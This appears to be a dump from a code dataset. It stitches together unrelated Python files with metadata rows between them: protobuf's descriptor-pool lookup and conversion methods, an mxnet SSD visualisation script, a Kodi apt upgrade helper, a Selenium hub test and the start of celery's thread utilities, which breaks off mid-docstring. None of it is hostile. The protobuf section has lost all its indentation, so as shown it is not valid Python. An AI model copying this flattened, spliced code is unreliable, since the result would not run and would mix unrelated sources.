try:
# Try fallback database. Build and find again if possible.
self._FindFileContainingSymbolInDb(symbol)
return self._InternalFindFileContainingSymbol(symbol)
except KeyError:
raise KeyError('Cannot find a file containing %s' % symbol)
def _InternalFindFileContainingSymbol(self, symbol):
"""Gets the already built FileDescriptor containing the specified symbol.
Args:
symbol (str): The name of the symbol to search for.
Returns:
FileDescriptor: Descriptor for the file that contains the specified
symbol.
Raises:
KeyError: if the file cannot be found in the pool.
"""
try:
return self._descriptors[symbol].file
except KeyError:
pass
try:
return self._enum_descriptors[symbol].file
except KeyError:
pass
try:
return self._service_descriptors[symbol].file
except KeyError:
pass
try:
return self._top_enum_values[symbol].type.file
except KeyError:
pass
try:
return self._file_desc_by_toplevel_extension[symbol]
except KeyError:
pass
# Try fields, enum values and nested extensions inside a message.
top_name, _, sub_name = symbol.rpartition('.')
try:
message = self.FindMessageTypeByName(top_name)
assert (sub_name in message.extensions_by_name or
sub_name in message.fields_by_name or
sub_name in message.enum_values_by_name)
return message.file
except (KeyError, AssertionError):
raise KeyError('Cannot find a file containing %s' % symbol)
def FindMessageTypeByName(self, full_name):
"""Loads the named descriptor from the pool.
Args:
full_name (str): The full name of the descriptor to load.
Returns:
Descriptor: The descriptor for the named type.
Raises:
KeyError: if the message cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
if full_name not in self._descriptors:
self._FindFileContainingSymbolInDb(full_name)
return self._descriptors[full_name]
def FindEnumTypeByName(self, full_name):
"""Loads the named enum descriptor from the pool.
Args:
full_name (str): The full name of the enum descriptor to load.
Returns:
EnumDescriptor: The enum descriptor for the named type.
Raises:
KeyError: if the enum cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
if full_name not in self._enum_descriptors:
self._FindFileContainingSymbolInDb(full_name)
return self._enum_descriptors[full_name]
def FindFieldByName(self, full_name):
"""Loads the named field descriptor from the pool.
Args:
full_name (str): The full name of the field descriptor to load.
Returns:
FieldDescriptor: The field descriptor for the named field.
Raises:
KeyError: if the field cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
message_name, _, field_name = full_name.rpartition('.')
message_descriptor = self.FindMessageTypeByName(message_name)
return message_descriptor.fields_by_name[field_name]
def FindOneofByName(self, full_name):
"""Loads the named oneof descriptor from the pool.
Args:
full_name (str): The full name of the oneof descriptor to load.
Returns:
OneofDescriptor: The oneof descriptor for the named oneof.
Raises:
KeyError: if the oneof cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
message_name, _, oneof_name = full_name.rpartition('.')
message_descriptor = self.FindMessageTypeByName(message_name)
return message_descriptor.oneofs_by_name[oneof_name]
def FindExtensionByName(self, full_name):
"""Loads the named extension descriptor from the pool.
Args:
full_name (str): The full name of the extension descriptor to load.
Returns:
FieldDescriptor: The field descriptor for the named extension.
Raises:
KeyError: if the extension cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
try:
# The proto compiler does not give any link between the FileDescriptor
# and top-level extensions unless the FileDescriptorProto is added to
# the DescriptorDatabase, but this can impact memory usage.
# So we registered these extensions by name explicitly.
return self._toplevel_extensions[full_name]
except KeyError:
pass
message_name, _, extension_name = full_name.rpartition('.')
try:
# Most extensions are nested inside a message.
scope = self.FindMessageTypeByName(message_name)
except KeyError:
# Some extensions are defined at file scope.
scope = self._FindFileContainingSymbolInDb(full_name)
return scope.extensions_by_name[extension_name]
def FindExtensionByNumber(self, message_descriptor, number):
"""Gets the extension of the specified message with the specified number.
Extensions have to be registered to this pool by calling :func:`Add` or
:func:`AddExtensionDescriptor`.
Args:
message_descriptor (Descriptor): descriptor of the extended message.
number (int): Number of the extension field.
Returns:
FieldDescriptor: The descriptor for the extension.
Raises:
KeyError: when no extension with the given number is known for the
specified message.
"""
try:
return self._extensions_by_number[message_descriptor][number]
except KeyError:
self._TryLoadExtensionFromDB(message_descriptor, number)
return self._extensions_by_number[message_descriptor][number]
def FindAllExtensions(self, message_descriptor):
"""Gets all the known extensions of a given message.
    Extensions have to be registered to this pool by calling
:func:`Add` or :func:`AddExtensionDescriptor`.
Args:
message_descriptor (Descriptor): Descriptor of the extended message.
Returns:
list[FieldDescriptor]: Field descriptors describing the extensions.
"""
# Fallback to descriptor db if FindAllExtensionNumbers is provided.
if self._descriptor_db and hasattr(
self._descriptor_db, 'FindAllExtensionNumbers'):
full_name = message_descriptor.full_name
all_numbers = self._descriptor_db.FindAllExtensionNumbers(full_name)
for number in all_numbers:
if number in self._extensions_by_number[message_descriptor]:
continue
self._TryLoadExtensionFromDB(message_descriptor, number)
return list(self._extensions_by_number[message_descriptor].values())
def _TryLoadExtensionFromDB(self, message_descriptor, number):
"""Try to Load extensions from descriptor db.
Args:
message_descriptor: descriptor of the extended message.
number: the extension number that needs to be loaded.
"""
if not self._descriptor_db:
return
# Only supported when FindFileContainingExtension is provided.
if not hasattr(
self._descriptor_db, 'FindFileContainingExtension'):
return
full_name = message_descriptor.full_name
file_proto = self._descriptor_db.FindFileContainingExtension(
full_name, number)
if file_proto is None:
return
try:
self._ConvertFileProtoToFileDescriptor(file_proto)
except:
warn_msg = ('Unable to load proto file %s for extension number %d.' %
(file_proto.name, number))
warnings.warn(warn_msg, RuntimeWarning)
def FindServiceByName(self, full_name):
"""Loads the named service descriptor from the pool.
Args:
full_name (str): The full name of the service descriptor to load.
Returns:
ServiceDescriptor: The service descriptor for the named service.
Raises:
KeyError: if the service cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
if full_name not in self._service_descriptors:
self._FindFileContainingSymbolInDb(full_name)
return self._service_descriptors[full_name]
def FindMethodByName(self, full_name):
"""Loads the named service method descriptor from the pool.
Args:
full_name (str): The full name of the method descriptor to load.
Returns:
MethodDescriptor: The method descriptor for the service method.
Raises:
KeyError: if the method cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
service_name, _, method_name = full_name.rpartition('.')
service_descriptor = self.FindServiceByName(service_name)
return service_descriptor.methods_by_name[method_name]
def _FindFileContainingSymbolInDb(self, symbol):
"""Finds the file in descriptor DB containing the specified symbol.
Args:
symbol (str): The name of the symbol to search for.
Returns:
FileDescriptor: The file that contains the specified symbol.
Raises:
KeyError: if the file cannot be found in the descriptor database.
"""
try:
file_proto = self._internal_db.FindFileContainingSymbol(symbol)
except KeyError as error:
if self._descriptor_db:
file_proto = self._descriptor_db.FindFileContainingSymbol(symbol)
else:
raise error
if not file_proto:
raise KeyError('Cannot find a file containing %s' % symbol)
return self._ConvertFileProtoToFileDescriptor(file_proto)
def _ConvertFileProtoToFileDescriptor(self, file_proto):
"""Creates a FileDescriptor from a proto or returns a cached copy.
This method also has the side effect of loading all the symbols found in
the file into the appropriate dictionaries in the pool.
Args:
file_proto: The proto to convert.
Returns:
A FileDescriptor matching the passed in proto.
"""
if file_proto.name not in self._file_descriptors:
built_deps = list(self._GetDeps(file_proto.dependency))
direct_deps = [self.FindFileByName(n) for n in file_proto.dependency]
public_deps = [direct_deps[i] for i in file_proto.public_dependency]
file_descriptor = descriptor.FileDescriptor(
pool=self,
name=file_proto.name,
package=file_proto.package,
syntax=file_proto.syntax,
options=_OptionsOrNone(file_proto),
serialized_pb=file_proto.SerializeToString(),
dependencies=direct_deps,
public_dependencies=public_deps,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
scope = {}
# This loop extracts all the message and enum types from all the
# dependencies of the file_proto. This is necessary to create the
# scope of available message types when defining the passed in
# file proto.
for dependency in built_deps:
scope.update(self._ExtractSymbols(
dependency.message_types_by_name.values()))
scope.update((_PrefixWithDot(enum.full_name), enum)
for enum in dependency.enum_types_by_name.values())
for message_type in file_proto.message_type:
message_desc = self._ConvertMessageDescriptor(
message_type, file_proto.package, file_descriptor, scope,
file_proto.syntax)
file_descriptor.message_types_by_name[message_desc.name] = (
message_desc)
for enum_type in file_proto.enum_type:
file_descriptor.enum_types_by_name[enum_type.name] = (
self._ConvertEnumDescriptor(enum_type, file_proto.package,
file_descriptor, None, scope, True))
for index, extension_proto in enumerate(file_proto.extension):
extension_desc = self._MakeFieldDescriptor(
extension_proto, file_proto.package, index, file_descriptor,
is_extension=True)
extension_desc.containing_type = self._GetTypeFromScope(
file_descriptor.package, extension_proto.extendee, scope)
self._SetFieldType(extension_proto, extension_desc,
file_descriptor.package, scope)
file_descriptor.extensions_by_name[extension_desc.name] = (
extension_desc)
self._file_desc_by_toplevel_extension[extension_desc.full_name] = (
file_descriptor)
for desc_proto in file_proto.message_type:
self._SetAllFieldTypes(file_proto.package, desc_proto, scope)
if file_proto.package:
desc_proto_prefix = _PrefixWithDot(file_proto.package)
else:
desc_proto_prefix = ''
for desc_proto in file_proto.message_type:
desc = self._GetTypeFromScope(
desc_proto_prefix, desc_proto.name, scope)
file_descriptor.message_types_by_name[desc_proto.name] = desc
for index, service_proto in enumerate(file_proto.service):
file_descriptor.services_by_name[service_proto.name] = (
self._MakeServiceDescriptor(service_proto, index, scope,
file_proto.package, file_descriptor))
self.Add(file_proto)
self._file_descriptors[file_proto.name] = file_descriptor
# Add extensions to the pool
file_desc = self._file_descriptors[file_proto.name]
for extension in file_desc.extensions_by_name.values():
self._AddExtensionDescriptor(extension)
for message_type in file_desc.message_types_by_name.values():
for extension in message_type.extensions:
self._AddExtensionDescriptor(extension)
return file_desc
def _ConvertMessageDescriptor(self, desc_proto, package=None, file_desc=None,
scope=None, syntax=None):
"""Adds the proto to the pool in the specified package.
Args:
desc_proto: The descriptor_pb2.DescriptorProto protobuf message.
package: The package the proto should be located in.
file_desc: The file containing this message.
scope: Dict mapping short and full symbols to message and enum types.
syntax: string indicating syntax of the file ("proto2" or "proto3")
Returns:
The added descriptor.
"""
if package:
desc_name = '.'.join((package, desc_proto.name))
else:
desc_name = desc_proto.name
if file_desc is None:
file_name = None
else:
file_name = file_desc.name
if scope is None:
scope = {}
nested = [
self._ConvertMessageDescriptor(
nested, desc_name, file_desc, scope, syntax)
for nested in desc_proto.nested_type]
enums = [
self._ConvertEnumDescriptor(enum, desc_name, file_desc, None,
scope, False)
for enum in desc_proto.enum_type]
fields = [self._MakeFieldDescriptor(field, desc_name, index, file_desc)
for index, field in enumerate(desc_proto.field)]
extensions = [
self._MakeFieldDescriptor(extension, desc_name, index, file_desc,
is_extension=True)
for index, extension in enumerate(desc_proto.extension)]
oneofs = [
# pylint: disable=g-complex-comprehension
descriptor.OneofDescriptor(desc.name, '.'.join((desc_name, desc.name)),
index, None, [], desc.options,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
for index, desc in enumerate(desc_proto.oneof_decl)]
extension_ranges = [(r.start, r.end) for r in desc_proto.extension_range]
if extension_ranges:
is_extendable = True
else:
is_extendable = False
desc = descriptor.Descriptor(
name=desc_proto.name,
full_name=desc_name,
filename=file_name,
containing_type=None,
fields=fields,
oneofs=oneofs,
nested_types=nested,
enum_types=enums,
extensions=extensions,
options=_OptionsOrNone(desc_proto),
is_extendable=is_extendable,
extension_ranges=extension_ranges,
file=file_desc,
serialized_start=None,
serialized_end=None,
syntax=syntax,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
for nested in desc.nested_types:
nested.containing_type = desc
for enum in desc.enum_types:
enum.containing_type = desc
for field_index, field_desc in enumerate(desc_proto.field):
if field_desc.HasField('oneof_index'):
oneof_index = field_desc.oneof_index
oneofs[oneof_index].fields.append(fields[field_index])
fields[field_index].containing_oneof = oneofs[oneof_index]
scope[_PrefixWithDot(desc_name)] = desc
self._CheckConflictRegister(desc, desc.full_name, desc.file.name)
self._descriptors[desc_name] = desc
return desc
def _ConvertEnumDescriptor(self, enum_proto, package=None, file_desc=None,
containing_type=None, scope=None, top_level=False):
"""Make a protobuf EnumDescriptor given an EnumDescriptorProto protobuf.
Args:
enum_proto: The descriptor_pb2.EnumDescriptorProto protobuf message.
package: Optional package name for the new message EnumDescriptor.
file_desc: The file containing the enum descriptor.
containing_type: The type containing this enum.
scope: Scope containing available types.
top_level: If True, the enum is a top level symbol. If False, the enum
is defined inside a message.
Returns:
The added descriptor
"""
if package:
enum_name = '.'.join((package, enum_proto.name))
else:
enum_name = enum_proto.name
if file_desc is None:
file_name = None
else:
file_name = file_desc.name
values = [self._MakeEnumValueDescriptor(value, index)
for index, value in enumerate(enum_proto.value)]
desc = descriptor.EnumDescriptor(name=enum_proto.name,
full_name=enum_name,
filename=file_name,
file=file_desc,
values=values,
containing_type=containing_type,
options=_OptionsOrNone(enum_proto),
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
scope['.%s' % enum_name] = desc
self._CheckConflictRegister(desc, desc.full_name, desc.file.name)
self._enum_descriptors[enum_name] = desc
# Add top level enum values.
if top_level:
for value in values:
full_name = _NormalizeFullyQualifiedName(
'.'.join((package, value.name)))
self._CheckConflictRegister(value, full_name, file_name)
self._top_enum_values[full_name] = value
return desc
def _MakeFieldDescriptor(self, field_proto, message_name, index,
file_desc, is_extension=False):
"""Creates a field descriptor from a FieldDescriptorProto.
For message and enum type fields, this method will do a look up
in the pool for the appropriate descriptor for that type. If it
is unavailable, it will fall back to the _source function to
create it. If this type is still unavailable, construction will
fail.
Args:
field_proto: The proto describing the field.
message_name: The name of the containing message.
index: Index of the field
file_desc: The file containing the field descriptor.
is_extension: Indication that this field is for an extension.
Returns:
An initialized FieldDescriptor object
"""
if message_name:
full_name = '.'.join((message_name, field_proto.name))
else:
full_name = field_proto.name
return descriptor.FieldDescriptor(
name=field_proto.name,
full_name=full_name,
index=index,
number=field_proto.number,
type=field_proto.type,
cpp_type=None,
message_type=None,
enum_type=None,
containing_type=None,
label=field_proto.label,
has_default_value=False,
default_value=None,
is_extension=is_extension,
extension_scope=None,
options=_OptionsOrNone(field_proto),
file=file_desc,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
def _SetAllFieldTypes(self, package, desc_proto, scope):
"""Sets all the descriptor's fields's types.
This method also sets the containing types on any extensions.
Args:
package: The current package of desc_proto.
desc_proto: The message descriptor to update.
scope: Enclosing scope of available types.
"""
package = _PrefixWithDot(package)
main_desc = self._GetTypeFromScope(package, desc_proto.name, scope)
if package == '.':
nested_package = _PrefixWithDot(desc_proto.name)
else:
nested_package = '.'.join([package, desc_proto.name])
for field_proto, field_desc in zip(desc_proto.field, main_desc.fields):
self._SetFieldType(field_proto, field_desc, nested_package, scope)
for extension_proto, extension_desc in (
zip(desc_proto.extension, main_desc.extensions)):
extension_desc.containing_type = self._GetTypeFromScope(
nested_package, extension_proto.extendee, scope)
self._SetFieldType(extension_proto, extension_desc, nested_package, scope)
for nested_type in desc_proto.nested_type:
self._SetAllFieldTypes(nested_package, nested_type, scope)
def _SetFieldType(self, field_proto, field_desc, package, scope):
"""Sets the field's type, cpp_type, message_type and enum_type.
Args:
field_proto: Data about the field in proto format.
field_desc: The descriptor to modify.
package: The package the field's container is in.
scope: Enclosing scope of available types.
"""
if field_proto.type_name:
desc = self._GetTypeFromScope(package, field_proto.type_name, scope)
else:
desc = None
if not field_proto.HasField('type'):
if isinstance(desc, descriptor.Descriptor):
field_proto.type = descriptor.FieldDescriptor.TYPE_MESSAGE
else:
field_proto.type = descriptor.FieldDescriptor.TYPE_ENUM
field_desc.cpp_type = descriptor.FieldDescriptor.ProtoTypeToCppProtoType(
field_proto.type)
if (field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE
or field_proto.type == descriptor.FieldDescriptor.TYPE_GROUP):
field_desc.message_type = desc
if field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM:
field_desc.enum_type = desc
if field_proto.label == descriptor.FieldDescriptor.LABEL_REPEATED:
field_desc.has_default_value = False
field_desc.default_value = []
elif field_proto.HasField('default_value'):
field_desc.has_default_value = True
if (field_proto.type == descriptor.FieldDescriptor.TYPE_DOUBLE or
field_proto.type == descriptor.FieldDescriptor.TYPE_FLOAT):
field_desc.default_value = float(field_proto.default_value)
elif field_proto.type == descriptor.FieldDescriptor.TYPE_STRING:
field_desc.default_value = field_proto.default_value
elif field_proto.type == descriptor.FieldDescriptor.TYPE_BOOL:
field_desc.default_value = field_proto.default_value.lower() == 'true'
elif field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM:
field_desc.default_value = field_desc.enum_type.values_by_name[
field_proto.default_value].number
elif field_proto.type == descriptor.FieldDescriptor.TYPE_BYTES:
field_desc.default_value = text_encoding.CUnescape(
field_proto.default_value)
elif field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE:
field_desc.default_value = None
else:
# All other types are of the "int" type.
field_desc.default_value = int(field_proto.default_value)
else:
field_desc.has_default_value = False
if (field_proto.type == descriptor.FieldDescriptor.TYPE_DOUBLE or
field_proto.type == descriptor.FieldDescriptor.TYPE_FLOAT):
field_desc.default_value = 0.0
elif field_proto.type == descriptor.FieldDescriptor.TYPE_STRING:
field_desc.default_value = u''
elif field_proto.type == descriptor.FieldDescriptor.TYPE_BOOL:
field_desc.default_value = False
elif field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM:
field_desc.default_value = field_desc.enum_type.values[0].number
elif field_proto.type == descriptor.FieldDescriptor.TYPE_BYTES:
field_desc.default_value = b''
elif field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE:
field_desc.default_value = None
else:
# All other types are of the "int" type.
field_desc.default_value = 0
field_desc.type = field_proto.type
def _MakeEnumValueDescriptor(self, value_proto, index):
"""Creates a enum value descriptor object from a enum value proto.
Args:
value_proto: The proto describing the enum value.
index: The index of the enum value.
Returns:
An initialized EnumValueDescriptor object.
"""
return descriptor.EnumValueDescriptor(
name=value_proto.name,
index=index,
number=value_proto.number,
options=_OptionsOrNone(value_proto),
type=None,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
def _MakeServiceDescriptor(self, service_proto, service_index, scope,
package, file_desc):
"""Make a protobuf ServiceDescriptor given a ServiceDescriptorProto.
Args:
service_proto: The descriptor_pb2.ServiceDescriptorProto protobuf message.
service_index: The index of the service in the File.
scope: Dict mapping short and full symbols to message and enum types.
package: Optional package name for the new message EnumDescriptor.
file_desc: The file containing the service descriptor.
Returns:
The added descriptor.
"""
if package:
service_name = '.'.join((package, service_proto.name))
else:
service_name = service_proto.name
methods = [self._MakeMethodDescriptor(method_proto, service_name, package,
scope, index)
for index, method_proto in enumerate(service_proto.method)]
desc = descriptor.ServiceDescriptor(
name=service_proto.name,
full_name=service_name,
index=service_index,
methods=methods,
options=_OptionsOrNone(service_proto),
file=file_desc,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
self._CheckConflictRegister(desc, desc.full_name, desc.file.name)
self._service_descriptors[service_name] = desc
return desc
def _MakeMethodDescriptor(self, method_proto, service_name, package, scope,
index):
"""Creates a method descriptor from a MethodDescriptorProto.
Args:
method_proto: The proto describing the method.
service_name: The name of the containing service.
package: Optional package name to look up for types.
scope: Scope containing available types.
index: Index of the method in the service.
Returns:
An initialized MethodDescriptor object.
"""
full_name = '.'.join((service_name, method_proto.name))
input_type = self._GetTypeFromScope(
package, method_proto.input_type, scope)
output_type = self._GetTypeFromScope(
package, method_proto.output_type, scope)
return descriptor.MethodDescriptor(
name=method_proto.name,
full_name=full_name,
index=index,
containing_service=None,
input_type=input_type,
output_type=output_type,
options=_OptionsOrNone(method_proto),
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
def _ExtractSymbols(self, descriptors):
"""Pulls out all the symbols from descriptor protos.
Args:
descriptors: The messages to extract descriptors from.
Yields:
A two element tuple of the type name and descriptor object.
"""
for desc in descriptors:
yield (_PrefixWithDot(desc.full_name), desc)
for symbol in self._ExtractSymbols(desc.nested_types):
yield symbol
for enum in desc.enum_types:
yield (_PrefixWithDot(enum.full_name), enum)
def _GetDeps(self, dependencies):
"""Recursively finds dependencies for file protos.
Args:
dependencies: The names of the files being depended on.
Yields:
Each direct and indirect dependency.
"""
for dependency in dependencies:
dep_desc = self.FindFileByName(dependency)
yield dep_desc
for parent_dep in dep_desc.dependencies:
yield parent_dep
def _GetTypeFromScope(self, package, type_name, scope):
"""Finds a given type name in the current scope.
Args:
package: The package the proto should be located in.
type_name: The name of the type to be found in the scope.
scope: Dict mapping short and full symbols to message and enum types.
Returns:
The descriptor for the requested type.
"""
if type_name not in scope:
components = _PrefixWithDot(package).split('.')
while components:
possible_match = '.'.join(components + [type_name])
if possible_match in scope:
type_name = possible_match
break
else:
components.pop(-1)
return scope[type_name]
def _PrefixWithDot(name):
return name if name.startswith('.') else '.%s' % name
if _USE_C_DESCRIPTORS:
# TODO(amauryfa): This pool could be constructed from Python code, when we
# support a flag like 'use_cpp_generated_pool=True'.
# pylint: disable=protected-access
_DEFAULT = descriptor._message.default_pool
else:
_DEFAULT = DescriptorPool()
def Default():
return _DEFAULT
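# Illustrative sketch (not part of the original module): build a small
# FileDescriptorProto in memory, add it to a fresh pool and look the message
# type up again. The package and message names are made up for the example.
def _ExamplePoolUsage():
  from google.protobuf import descriptor_pb2

  file_proto = descriptor_pb2.FileDescriptorProto()
  file_proto.name = 'example/person.proto'
  file_proto.package = 'example'
  message_proto = file_proto.message_type.add()
  message_proto.name = 'Person'
  field_proto = message_proto.field.add()
  field_proto.name = 'name'
  field_proto.number = 1
  field_proto.type = descriptor_pb2.FieldDescriptorProto.TYPE_STRING
  field_proto.label = descriptor_pb2.FieldDescriptorProto.LABEL_OPTIONAL

  pool = DescriptorPool()
  pool.Add(file_proto)
  return pool.FindMessageTypeByName('example.Person')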
| apache-2.0 | -2,547,859,049,443,851,000 | 35.617624 | 86 | 0.677553 | false |
Ldpe2G/mxnet | example/ssd/tools/visualize_net.py | 10 | 1148 | from __future__ import print_function
import find_mxnet
import mxnet as mx
import importlib
import argparse
import sys
parser = argparse.ArgumentParser(description='network visualization')
parser.add_argument('--network', type=str, default='vgg16_ssd_300',
choices = ['vgg16_ssd_300', 'vgg16_ssd_512'],
help = 'the cnn to use')
parser.add_argument('--num-classes', type=int, default=20,
help='the number of classes')
parser.add_argument('--data-shape', type=int, default=300,
help='set image\'s shape')
parser.add_argument('--train', action='store_true', default=False, help='show train net')
args = parser.parse_args()
sys.path.append('../symbol')
if not args.train:
net = importlib.import_module("symbol_" + args.network).get_symbol(args.num_classes)
a = mx.viz.plot_network(net, shape={"data":(1,3,args.data_shape,args.data_shape)}, \
node_attrs={"shape":'rect', "fixedsize":'false'})
a.render("ssd_" + args.network)
else:
net = importlib.import_module("symbol_" + args.network).get_symbol_train(args.num_classes)
print(net.tojson())
| apache-2.0 | -8,409,465,352,750,513,000 | 40 | 94 | 0.655923 | false |
atupone/xbmc | addons/service.xbmc.versioncheck/lib/aptdeamonhandler.py | 177 | 3661 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import xbmc
from common import *
try:
#import apt
import apt
from aptdaemon import client
from aptdaemon import errors
except:
log('python apt import error')
class AptdeamonHandler:
    def __init__(self):
        self.aptclient = client.AptClient()
        self._pwd = ''  # password cache read by _getpassword()
def _check_versions(self, package):
if not self._update_cache():
return False, False
try:
trans = self.aptclient.upgrade_packages([package])
#trans = self.aptclient.upgrade_packages("bla")
trans.simulate(reply_handler=self._apttransstarted, error_handler=self._apterrorhandler)
pkg = trans.packages[4][0]
if pkg == package:
cache=apt.Cache()
cache.open(None)
cache.upgrade()
if cache[pkg].installed:
return cache[pkg].installed.version, cache[pkg].candidate.version
return False, False
except Exception as error:
log("Exception while checking versions: %s" %error)
return False, False
def _update_cache(self):
try:
if self.aptclient.update_cache(wait=True) == "exit-success":
return True
else:
return False
except errors.NotAuthorizedError:
log("You are not allowed to update the cache")
return False
def check_upgrade_available(self, package):
'''returns True if newer package is available in the repositories'''
installed, candidate = self._check_versions(package)
if installed and candidate:
if installed != candidate:
log("Version installed %s" %installed)
log("Version available %s" %candidate)
return True
else:
log("Already on newest version")
elif not installed:
log("No installed package found")
return False
else:
return False
def upgrade_package(self, package):
try:
log("Installing new version")
if self.aptclient.upgrade_packages([package], wait=True) == "exit-success":
log("Upgrade successful")
return True
except Exception as error:
log("Exception during upgrade: %s" %error)
return False
def upgrade_system(self):
try:
log("Upgrading system")
if self.aptclient.upgrade_system(wait=True) == "exit-success":
return True
except Exception as error:
log("Exception during system upgrade: %s" %error)
return False
def _getpassword(self):
if len(self._pwd) == 0:
self._pwd = get_password_from_user()
return self._pwd
def _apttransstarted(self):
pass
def _apterrorhandler(self, error):
log("Apt Error %s" %error) | gpl-2.0 | -6,974,354,175,733,703,000 | 32.59633 | 100 | 0.593281 | false |
slaws/kubernetes | examples/selenium/selenium-test.py | 173 | 1109 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
def check_browser(browser):
driver = webdriver.Remote(
command_executor='http://selenium-hub:4444/wd/hub',
desired_capabilities=getattr(DesiredCapabilities, browser)
)
driver.get("http://google.com")
assert "google" in driver.page_source
driver.close()
print("Browser %s checks out!" % browser)
check_browser("FIREFOX")
check_browser("CHROME")
| apache-2.0 | 548,476,315,147,377,340 | 32.606061 | 78 | 0.759243 | false |
johankaito/fufuka | microblog/flask/venv/lib/python2.7/site-packages/celery/utils/threads.py | 9 | 9636 | # -*- coding: utf-8 -*-
"""
celery.utils.threads
~~~~~~~~~~~~~~~~~~~~
Threading utilities.
"""
from __future__ import absolute_import, print_function
import os
import socket
import sys
import threading
import traceback
from contextlib import contextmanager
from celery.local import Proxy
from celery.five import THREAD_TIMEOUT_MAX, items
__all__ = ['bgThread', 'Local', 'LocalStack', 'LocalManager',
'get_ident', 'default_socket_timeout']
USE_FAST_LOCALS = os.environ.get('USE_FAST_LOCALS')
PY3 = sys.version_info[0] == 3
@contextmanager
def default_socket_timeout(timeout):
prev = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
yield
socket.setdefaulttimeout(prev)
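# Illustrative usage sketch (not part of the original module): run a blocking
# connect under a temporarily lowered default socket timeout; the host and
# port here are placeholders.
def _timeout_demo(host='example.com', port=80):
    with default_socket_timeout(5.0):
        return socket.create_connection((host, port))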
class bgThread(threading.Thread):
def __init__(self, name=None, **kwargs):
super(bgThread, self).__init__()
self._is_shutdown = threading.Event()
self._is_stopped = threading.Event()
self.daemon = True
self.name = name or self.__class__.__name__
def body(self):
raise NotImplementedError('subclass responsibility')
def on_crash(self, msg, *fmt, **kwargs):
print(msg.format(*fmt), file=sys.stderr)
exc_info = sys.exc_info()
try:
traceback.print_exception(exc_info[0], exc_info[1], exc_info[2],
None, sys.stderr)
finally:
del(exc_info)
def run(self):
body = self.body
shutdown_set = self._is_shutdown.is_set
try:
while not shutdown_set():
try:
body()
except Exception as exc:
try:
self.on_crash('{0!r} crashed: {1!r}', self.name, exc)
self._set_stopped()
finally:
os._exit(1) # exiting by normal means won't work
finally:
self._set_stopped()
def _set_stopped(self):
try:
self._is_stopped.set()
except TypeError: # pragma: no cover
# we lost the race at interpreter shutdown,
# so gc collected built-in modules.
pass
def stop(self):
"""Graceful shutdown."""
self._is_shutdown.set()
self._is_stopped.wait()
if self.is_alive():
self.join(THREAD_TIMEOUT_MAX)
try:
from greenlet import getcurrent as get_ident
except ImportError: # pragma: no cover
try:
from _thread import get_ident # noqa
except ImportError:
try:
from thread import get_ident # noqa
except ImportError: # pragma: no cover
try:
from _dummy_thread import get_ident # noqa
except ImportError:
from dummy_thread import get_ident # noqa
def release_local(local):
"""Releases the contents of the local for the current context.
This makes it possible to use locals without a manager.
Example::
>>> loc = Local()
>>> loc.foo = 42
>>> release_local(loc)
>>> hasattr(loc, 'foo')
False
With this function one can release :class:`Local` objects as well
    as :class:`StackLocal` objects. However, it is not possible to
release data held by proxies that way, one always has to retain
a reference to the underlying local object in order to be able
to release it.
.. versionadded:: 0.6.1
"""
local.__release_local__()
class Local(object):
__slots__ = ('__storage__', '__ident_func__')
def __init__(self):
object.__setattr__(self, '__storage__', {})
object.__setattr__(self, '__ident_func__', get_ident)
def __iter__(self):
return iter(items(self.__storage__))
def __call__(self, proxy):
"""Create a proxy for a name."""
return Proxy(self, proxy)
def __release_local__(self):
self.__storage__.pop(self.__ident_func__(), None)
def __getattr__(self, name):
try:
return self.__storage__[self.__ident_func__()][name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
ident = self.__ident_func__()
storage = self.__storage__
try:
storage[ident][name] = value
except KeyError:
storage[ident] = {name: value}
def __delattr__(self, name):
try:
del self.__storage__[self.__ident_func__()][name]
except KeyError:
raise AttributeError(name)
class _LocalStack(object):
"""This class works similar to a :class:`Local` but keeps a stack
of objects instead. This is best explained with an example::
>>> ls = LocalStack()
>>> ls.push(42)
>>> ls.top
42
>>> ls.push(23)
>>> ls.top
23
>>> ls.pop()
23
>>> ls.top
42
They can be force released by using a :class:`LocalManager` or with
the :func:`release_local` function but the correct way is to pop the
item from the stack after using. When the stack is empty it will
no longer be bound to the current context (and as such released).
By calling the stack without arguments it will return a proxy that
